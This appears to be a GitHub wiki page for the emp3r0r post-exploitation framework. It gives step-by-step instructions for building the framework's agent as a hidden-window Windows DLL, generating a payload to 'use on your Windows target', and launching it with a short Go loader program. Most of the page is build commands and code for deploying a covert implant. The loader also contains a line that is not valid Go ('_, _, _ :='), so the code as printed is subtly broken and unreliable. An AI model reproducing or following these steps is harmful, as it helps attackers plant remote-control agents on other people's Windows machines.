-
-
Notifications
You must be signed in to change notification settings - Fork 257
DLL Agent
Jing Mi edited this page Jan 30, 2024
·
10 revisions
Modify ./cmd/agent/main.go to make it include this:
// everything else
import "C"
//export main
func main() {
// everything else
}This should export function main to make it callable.
Build the agent DLL on Windows host, with the following command:
go build -buildmode=c-shared -ldflags='-s -w -H=windowsgui' -o emp3r0r.dll .\cmd\agent\
Copy emp3r0r.dll to ~/.emp3r0r/stub-win-dll-amd64, then open emp3r0r.
Run gen_agent and select option 3.
Copy the generated DLL and use it on your Windows target.
Here's a small tool that invokes a certain function from a certain DLL:
package main
import (
"flag"
"fmt"
"syscall"
)
func main() {
dll_file := flag.String("dll", "", "Load this DLL file")
func_name := flag.String("func", "", "Call this function")
flag.Parse()
dllPath := *dll_file
procName := *func_name
// Load the DLL
dll, err := syscall.LoadLibrary(dllPath)
if err != nil {
fmt.Println("Error loading DLL:", err)
return
}
defer syscall.FreeLibrary(dll)
// Get the function address
proc, err := syscall.GetProcAddress(dll, procName)
if err != nil {
fmt.Println("Error getting function address:", err)
return
}
// Call the function
_, _, _ := syscall.SyscallN(proc, 0, 0, 0, 0)
}Build and run it:
$env:VERBOSE='true' # enable logging so you know the agent is running
.\rundll.exe -func main -dll emp3r0r.dll